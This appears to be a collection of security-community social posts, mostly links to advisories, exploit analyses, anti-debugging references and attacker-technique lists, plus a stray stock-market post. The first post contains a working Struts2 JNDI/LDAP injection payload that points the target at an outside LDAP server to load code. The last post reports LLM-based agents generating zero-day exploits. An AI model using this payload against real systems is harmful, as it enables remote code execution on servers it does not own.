Struts2 RCE PoC/IoC: /$%7bjndi:ldap:/$%7blower:/%7d192.168.139.1:1389/o=tomcat%7d$%7blower:/%7d/ Disclaimer: This isn't an 0day, It has already been mentioned as vulnerable in many Chinese blog post youtube.com/watch?v=D-TwQR… *this really reminds me of SpEL injection

Windows Privileges (I don't know the original author, but is useful content.)

Want to learn Cloud Security? Here are some of awesome Cloud Security related resources! github.com/4ndersonLin/aw…

Powershell for Hackers, Part 1: Getting Started with Powershell #powershell #infosec #cybersecurity #cyberwarrior hackers-arise.com/post/2017/04/2… #cyberwarrior #networkbasics

TeamTNT is known for attacking insecure & vulnerable Kubernetes deployments. In an article for VB Aditya K Sood presents a new module introduced by TeamTNT to utilize NVIDIA’s GPU capabilities to conduct advanced mining operations. virusbulletin.com/virusbulletin/…

SoftICE . . . go :v

[ZDI-22-872|CVE-2022-28684] DevExpress SafeBinaryFormatter Deserialization of Untrusted Data Remote Code Execution Vulnerability (CVSS 8.8) zerodayinitiative.com/advisories/ZDI…

🤣

The last part of A New Attack Surface on MS Exchange - #ProxyRelay is out! Have also left some final thoughts on the Closing part. Hope you all enjoy this journey :D blog.orange.tw/2022/10/proxyr…

testbnull.medium.com/ph%C3%A2n-t%C3…

This is a major warning signal for the stock market Smart money confidence has been dropping like a stone

A list of some great sites lolbas-project.github.io loldrivers.io gtfobins.github.io lots-project.com filesec.io malapi.io hijacklibs.net wadcoms.github.io persistence-info.github.io unprotect.it

"The WebP 0day" -- a full technical analysis the recently patched vulnerability in the WebP image library that was exploited in the wild (CVE-2023-4863). blog.isosceles.com/the-webp-0day/

Web Security vs. Binary Exploitation

The ART of Chaining Vulnerabilities Have a read: ahmdhalabi.medium.com/the-art-of-cha… #cybersecurity #Pentesting #Hacking #bugbountytips #infosec #cybersecuritytips #redteam #coding #100DaysOfHacking #vulnerabilities #BugBounty #100DaysOfCyberSecurity #CyberSecurityAwareness

Windows Anti Debug Tricks: * Debug Flags: anti-debug.checkpoint.com/techniques/deb… * Object Handles: anti-debug.checkpoint.com/techniques/obj… * Exceptions: anti-debug.checkpoint.com/techniques/exc… * Timing: anti-debug.checkpoint.com/techniques/tim… * Process Memory: anti-debug.checkpoint.com/techniques/pro… * Assembly instructions: anti-debug.checkpoint.com/techniques/ass… * Direct

Who snitched ???😭

A 0-click exploit chain for the Pixel 9 Part 1: Decoding Dolby projectzero.google/2026/01/pixel-…

Blog post: On the Coming Industrialisation of Exploit Generation with LLMs sean.heelan.io/2026/01/18/on-… TL;DR: I ran an experiment with GPT-5.2 and Opus 4.5 based agents to generate exploits for a zeroday QuickJS bug. They're pretty good at it. Code: github.com/SeanHeelan/ana…